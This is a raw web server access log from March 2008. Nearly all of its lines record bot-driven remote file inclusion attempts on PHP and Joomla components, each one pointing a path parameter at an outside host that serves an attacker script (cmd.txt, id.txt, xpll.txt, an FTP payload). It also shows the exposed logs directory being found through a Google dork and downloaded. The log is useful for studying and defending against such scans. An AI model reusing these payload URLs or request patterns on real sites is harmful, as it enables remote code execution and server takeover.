85.234.144.44 - - [23/Mar/2008:19:21:53 -0700] "GET /logs/access.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
72.9.145.111 - - [23/Mar/2008:19:22:55 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:23:15 -0700] "GET /logs/access_071028.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:23:17 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.9.145.111 - - [23/Mar/2008:19:23:48 -0700] "GET /logs/access_071224.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.53.160.98 - - [23/Mar/2008:19:24:00 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.160.98 - - [23/Mar/2008:19:24:00 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.rockhardnails.com/catalog/includes/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
76.88.24.0 - - [23/Mar/2008:19:24:00 -0700] "GET /logs/access_071022.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.88.24.0 - - [23/Mar/2008:19:24:01 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.88.24.0 - - [23/Mar/2008:19:24:02 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:24:14 -0700] "GET /logs/access_070716.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:24:14 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:24:37 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:24:38 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.137.139.73 - - [23/Mar/2008:19:25:07 -0700] "GET /logs/access_070924.log/index.php?option=com_phpshop&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.29.71.91 - - [23/Mar/2008:19:25:27 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.71.91 - - [23/Mar/2008:19:25:28 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:25:29 -0700] "GET /index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:25:29 -0700] "GET /logs/index.php?redir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:26:17 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:19:26:27 -0700] "GET /index1.php?page=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.28.112.51 - - [23/Mar/2008:19:27:58 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.28.112.51 - - [23/Mar/2008:19:27:58 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:28:02 -0700] "GET /logs/access_070820.log//components/com_rsgallery/detail.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:28:03 -0700] "GET //components/com_rsgallery/detail.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:28:04 -0700] "GET /logs//components/com_rsgallery/detail.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.9.78.190 - - [23/Mar/2008:19:29:02 -0700] "GET //php?meio=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:29:10 -0700] "GET //skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:29:55 -0700] "GET /logs/access_071028.log//components/com_rsgallery/detail.php?mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:30:14 -0700] "GET /logs/access_071022.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.105.133 - - [23/Mar/2008:19:30:14 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://darkness.ws/xpl/bot/ids.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:19:30:18 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 1048576 "-" "-" "www.galf.org"
194.126.239.14 - - [23/Mar/2008:19:30:37 -0700] "GET /logs/access_080218.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.234.144.44 - - [23/Mar/2008:19:31:38 -0700] "GET /logs/access_070910.log//skin/zero_vote/ask_password.php?dir=http://www.geocities.com/guest1380/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.154.114 - - [23/Mar/2008:19:32:50 -0700] "GET //header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.10.154.114 - - [23/Mar/2008:19:32:50 -0700] "GET /logs//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
206.53.51.240 - - [23/Mar/2008:19:33:02 -0700] "GET //header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
206.53.51.240 - - [23/Mar/2008:19:33:02 -0700] "GET /logs//header.php?css_path=http://gimpindustries.net/ca/images/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:33:18 -0700] "GET /sbeesley@shaw.ca,http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:33:18 -0700] "GET /logs/sbeesley@shaw.ca,http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
72.29.71.91 - - [23/Mar/2008:19:34:31 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.69.254.244 - - [23/Mar/2008:19:34:49 -0700] "GET /logs/ HTTP/1.1" 200 6801 "http://www.google.com/search?q=intitle:index.of.logs&hl=en&lr=&safe=off&start=10&sa=N" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.galf.org"
67.69.254.244 - - [23/Mar/2008:19:34:51 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:35:20 -0700] "GET /logs/access_080218.log//interna.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:35:20 -0700] "GET //interna.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:35:21 -0700] "GET /logs//interna.php?meio=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.69.254.244 - - [23/Mar/2008:19:36:34 -0700] "GET /logs/access_080218.log HTTP/1.1" 200 300288 "http://www.galf.org/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "www.galf.org"
205.234.200.223 - - [23/Mar/2008:19:36:40 -0700] "GET /main.php?x=http://br.geocities.com/botnet2006/include.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.19.144.26 - - [23/Mar/2008:19:36:59 -0700] "GET /logs/access_080225.log/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [23/Mar/2008:19:36:59 -0700] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
83.19.144.26 - - [23/Mar/2008:19:37:00 -0700] "GET /logs/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
72.29.71.91 - - [23/Mar/2008:19:37:08 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.71.91 - - [23/Mar/2008:19:37:30 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
66.7.207.104 - - [23/Mar/2008:19:37:51 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:37:56 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:37:57 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:37:57 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:37:57 -0700] "GET //php?meio=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.186.169.183 - - [23/Mar/2008:19:37:59 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:38:22 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.201.194 - - [23/Mar/2008:19:38:30 -0700] "GET /logs/access_070806.log//components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.201.194 - - [23/Mar/2008:19:38:30 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.200.201.194 - - [23/Mar/2008:19:38:30 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.111 - - [23/Mar/2008:19:38:45 -0700] "GET /logs/index2.php?x=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.145.111 - - [23/Mar/2008:19:38:45 -0700] "GET /index2.php?x=http://www.lirik.biz//skins/bobbyzhuo/.debug/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:39:03 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:39:04 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:39:17 -0700] "GET /logs/access_071203.log//modules/agendax/config.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:39:17 -0700] "GET //modules/agendax/config.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:39:18 -0700] "GET /logs//modules/agendax/config.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.109.103.220 - - [23/Mar/2008:19:39:18 -0700] "GET /logs/access_080114.log//modules/agendax/config.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.9.78.190 - - [23/Mar/2008:19:39:31 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
204.9.78.190 - - [23/Mar/2008:19:39:46 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.46.128.50 - - [23/Mar/2008:19:41:41 -0700] "GET /logs/access_071231.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:41:42 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [23/Mar/2008:19:41:55 -0700] "GET /logs/access_080113.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [23/Mar/2008:19:41:55 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [23/Mar/2008:19:41:56 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tovr.com/images/id.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:42:04 -0700] "GET /logs/access_071217.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:42:25 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:42:51 -0700] "GET /index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:42:52 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:43:04 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:43:04 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:43:05 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:43:14 -0700] "GET /logs/access_070903.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:43:14 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:43:17 -0700] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:43:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:43:39 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:43:40 -0700] "GET /logs/access_080113.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:43:54 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:44:02 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:19:44:19 -0700] "GET /index2.php?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:44:41 -0700] "GET /logs/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.247.44.96 - - [23/Mar/2008:19:44:41 -0700] "GET /index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:44:52 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.46.128.50 - - [23/Mar/2008:19:44:52 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.isogo.co.za/sendstudio/archive/8/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:45:14 -0700] "GET /logs/access.log/index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:45:14 -0700] "GET /index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.137.24 - - [23/Mar/2008:19:45:14 -0700] "GET /logs/index.php?cal=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.92.85.176 - - [23/Mar/2008:19:45:29 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.92.85.176 - - [23/Mar/2008:19:45:29 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.compassoc.com/themes/ca/images/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
76.88.24.0 - - [23/Mar/2008:19:45:34 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
76.88.24.0 - - [23/Mar/2008:19:45:40 -0700] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
76.88.24.0 - - [23/Mar/2008:19:45:41 -0700] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://erusrox.t35.com/ids/goodid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
72.29.71.91 - - [23/Mar/2008:19:46:32 -0700] "GET /index.php?inc=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:46:41 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:46:42 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:46:58 -0700] "GET /logs/access_080218.log//php?meio=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:46:59 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
160.99.12.231 - - [23/Mar/2008:19:46:59 -0700] "GET /logs//php?meio=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.29.70.163 - - [23/Mar/2008:19:48:03 -0700] "GET /logs/access_080114.log//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.70.163 - - [23/Mar/2008:19:48:03 -0700] "GET /logs//mvcw_conver.php?step=http://www.liautism.com/media/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
190.54.28.163 - - [23/Mar/2008:19:48:07 -0700] "GET /index.php?go=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.152.13 - - [23/Mar/2008:19:48:09 -0700] "GET /index.php?option=com_akobook&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:48:12 -0700] "GET /logs/access_080218.log//php?meio=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:48:12 -0700] "GET //php?meio=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.7.207.104 - - [23/Mar/2008:19:48:12 -0700] "GET /logs//php?meio=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:48:20 -0700] "GET /logs/access_080218.log//php?meio=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.61.37.111 - - [23/Mar/2008:19:48:20 -0700] "GET /logs//php?meio=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.230.15.10 - - [23/Mar/2008:19:48:24 -0700] "GET /logs/access_071028.log/index.php3?s=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
58.65.239.170 - - [23/Mar/2008:19:48:37 -0700] "GET /logs/access_070924.log HTTP/1.1" 200 393216 "-" "-" "www.galf.org"
